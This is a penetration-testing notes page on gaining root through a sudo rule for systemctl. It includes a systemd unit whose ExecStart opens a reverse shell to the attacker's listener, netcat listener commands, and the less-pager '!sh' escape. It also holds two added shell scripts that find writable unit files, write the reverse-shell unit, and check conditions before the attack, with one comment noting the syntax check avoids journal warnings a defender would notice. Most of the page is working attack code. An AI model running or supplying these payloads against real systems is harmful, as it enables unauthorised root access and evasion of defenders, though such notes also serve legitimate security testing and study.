# Sudo Systemctl Privilege Escalation

### [Modify Configurations](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#modify-configurations) <a href="#modify-configurations" id="modify-configurations"></a>

```sh
sudo -l

(ALL) NOPASSWD: systemctl
```

If we can run **"systemctl"** as root through sudo and we can write a unit file (an existing one, or a new one in a unit directory we can write to, such as /etc/systemd/system), we can make systemd run any command as root.

#### [1. Update the Config File](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#1.-update-the-config-file) <a href="#id-1.-update-the-config-file" id="id-1.-update-the-config-file"></a>

Put a reverse-shell payload in the `ExecStart=` line of a unit file we can write, for example /etc/systemd/system/example.service:

```ini
[Unit]
Description=This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
```

Replace **“\<local-ip>”** with the IP address of the machine that will run the listener. Every line outside a `[Section]` header must be `Key=Value`; a bare sentence under `[Unit]` is ignored by systemd with a warning in the journal.

#### [2. Start Listener in Local Machine](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#2.-start-listener-in-local-machine) <a href="#id-2.-start-listener-in-local-machine" id="id-2.-start-listener-in-local-machine"></a>

Then start a listener on the local machine to catch the root shell.

```sh
nc -lvnp 4444
```

#### [3. Restart the Service](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#3.-restart-the-service) <a href="#id-3.-restart-the-service" id="id-3.-restart-the-service"></a>

Reload the unit files so systemd picks up the edit, then restart the service so `ExecStart=` runs (`restart` also starts a unit that is not running yet).

```sh
sudo systemctl daemon-reload
sudo systemctl restart example.service
```

A root shell should now connect back to the listener. With `Type=simple` the unit stays active for as long as the shell is connected and goes to inactive or failed when it exits, which is visible in `systemctl status`.
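The following script is an added example and not part of the original page. It automates the three steps above: it lists the unit files and unit directories the current user can write, renders the unit shown above with the listener address filled in, and checks that every line is `Key=Value` before the `daemon-reload`. The script name, the unit path and the LHOST/LPORT arguments are assumptions; the sudo step is printed rather than run so the output can be reviewed first.

```shell
#!/bin/sh
# Added example (not from the original page): find unit files the current user
# can write, generate the reverse-shell unit from the text above, and sanity
# check it before the daemon-reload/restart. Assumes a POSIX shell and
# coreutils; the unit path, LHOST and LPORT are command-line arguments.

# Print every *.service file under the given directories (default: the usual
# systemd unit directories) that the current user can write.
find_writable_units() {
    [ $# -eq 0 ] && set -- /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*.service; do
            if [ -f "$f" ] && [ -w "$f" ]; then
                printf '%s\n' "$f"
            fi
        done
    done
    return 0
}

# A writable unit directory is just as useful: a brand-new unit can be dropped there.
find_writable_unit_dirs() {
    [ $# -eq 0 ] && set -- /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system
    for dir in "$@"; do
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
    return 0
}

# Emit the unit from the page with LHOST ($1) and LPORT ($2) filled in.
make_revshell_unit() {
    cat <<EOF
[Unit]
Description=This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/$1/$2 0>&1'

[Install]
WantedBy=multi-user.target
EOF
}

# Reject unit files containing lines systemd would ignore: anything that is not
# blank, a comment, a [Section] header or Key=Value. Reports offenders on
# stderr and returns 1 if any were found.
check_unit_syntax() {
    n=0
    bad=0
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case "$line" in
            ''|'#'*|';'*|'['*']'|*=*) ;;
            *) printf 'line %d has no "=": %s\n' "$n" "$line" >&2; bad=1 ;;
        esac
    done < "$1"
    return "$bad"
}

# Usage: sh unit-payload.sh /etc/systemd/system/example.service 10.10.14.5 4444
# With no arguments the script only prints what is writable.
if [ $# -eq 3 ]; then
    make_revshell_unit "$2" "$3" > "$1"
    check_unit_syntax "$1" || exit 1
    echo "wrote $1; now run: sudo systemctl daemon-reload && sudo systemctl restart $(basename "$1")"
elif [ $# -eq 0 ]; then
    echo "writable unit files:";   find_writable_units
    echo "writable unit directories:"; find_writable_unit_dirs
fi
```

Run it once without arguments to see what is writable, then with the chosen unit path, listener IP and port. `check_unit_syntax` exists because the `[Unit]` block on the page is easy to get wrong by hand; a line without `=` does not stop the service from starting, but it leaves a warning in the journal that a defender will notice.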


### [Spawn Shell in the Pager](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#spawn-shell-in-the-pager) <a href="#spawn-shell-in-the-pager" id="spawn-shell-in-the-pager"></a>

```bash
sudo -l

# output
(ALL) NOPASSWD: systemctl status example.service
```

If we can only run **`systemctl status`** as root, the output is fed through a pager (less by default), and that pager is itself running as root. less can spawn a shell, so just run the command with `sudo`.

```bash
sudo systemctl status example.service
```

When the pager opens, type the following at its prompt (`!` followed by a command runs that command from less):

```bash
!sh
```

The shell spawned from the pager inherits the pager's privileges, and the pager was started by a root `systemctl`, so this is a root shell, not just another shell as the same user. Two things make the trick fail in practice. systemctl starts less with `LESS=FRSXMK`, and the `F` flag makes less exit as soon as the whole output fits on one screen, so the prompt never appears for a short status; shrink the terminal first (`stty rows 5`) or pick a unit with plenty of journal lines. And systemd 247 and later start the pager with `LESSSECURE=1` when the effective UID differs from the login session's owner, which is exactly the sudo case, so less refuses `!sh` with "Command not available" (the unhardened older versions are tracked as CVE-2023-26604).
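The script below is an added example, not part of the original page or of GTFOBins. It checks the two preconditions just described before the attempt is burned: the systemd version (secure pager mode from 247 on) and whether the status output is long enough for less to stay open on the current terminal. It assumes `systemctl --version` prints `systemd NNN (...)` on its first line, that systemctl starts less with `LESS=FRSXMK`, and that the sudoers entry allows exactly `systemctl status <unit>` (so the line count is taken through a pipe, which makes systemctl skip the pager, rather than with an extra `--no-pager` flag the sudoers entry would not match). The script name and the sample version strings are constructed.

```shell
#!/bin/sh
# Added example (not from the original page): decide in advance whether the
# "!sh in the pager" trick can work on this host. Assumes: `systemctl --version`
# prints "systemd NNN (...)" as its first line; systemctl starts less with
# LESS=FRSXMK unless SYSTEMD_LESS is set (sudo's env_reset drops it anyway);
# systemd >= 247 starts the pager with LESSSECURE=1 when the effective UID is
# not the login session's owner, which is the sudo case.

# Pull the major version out of `systemctl --version` text (passed in as an
# argument so it can be tested offline). Prints e.g. 252, nothing on no match.
systemd_major_version() {
    printf '%s\n' "$1" | sed -n '1s/^systemd \([0-9][0-9]*\).*/\1/p'
}

# Returns 0 when this systemd runs the pager in secure mode under sudo, i.e.
# less will answer "!sh" with "Command not available".
pager_secure_mode_expected() {
    v=$(systemd_major_version "$1")
    [ -n "$v" ] && [ "$v" -ge 247 ]
}

# The F in LESS=FRSXMK makes less quit immediately when everything fits on one
# screen, so there is no prompt to type "!sh" into. Returns 0 when $1 output
# lines exceed $2 terminal rows and less will wait for input.
pager_will_stay_open() {
    [ "$1" -gt "$2" ]
}

# Live check for a unit we may `systemctl status` via sudo (default example.service).
preflight() {
    unit=${1:-example.service}
    ver=$(systemctl --version 2>/dev/null) || { echo "systemctl not available"; return 2; }
    if pager_secure_mode_expected "$ver"; then
        echo "systemd $(systemd_major_version "$ver") >= 247: pager runs with LESSSECURE=1, '!sh' will be refused"
        return 1
    fi
    rows=$(stty size 2>/dev/null | cut -d' ' -f1)
    rows=${rows:-24}
    # stdout is a pipe here, so systemctl skips the pager and we only count
    # lines; the command still matches the sudoers entry character for character.
    lines=$(sudo systemctl status "$unit" 2>/dev/null | wc -l)
    if pager_will_stay_open "$lines" "$rows"; then
        echo "$lines lines on a $rows-row terminal: less will wait; run 'sudo systemctl status $unit' and type !sh"
    else
        echo "$lines lines fit in $rows rows: less would quit at once; shrink the terminal first (stty rows 5) and retry"
    fi
}

# Usage: sh pager-check.sh run [unit]
if [ "${1:-}" = run ]; then
    preflight "${2:-}"
fi
```

The version check is the one that matters most: on a systemd 247+ host the `!sh` route is closed regardless of terminal size, and the effort is better spent on a writable unit file or a different sudo rule.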

### References

* <https://gtfobins.github.io/gtfobins/systemctl/>

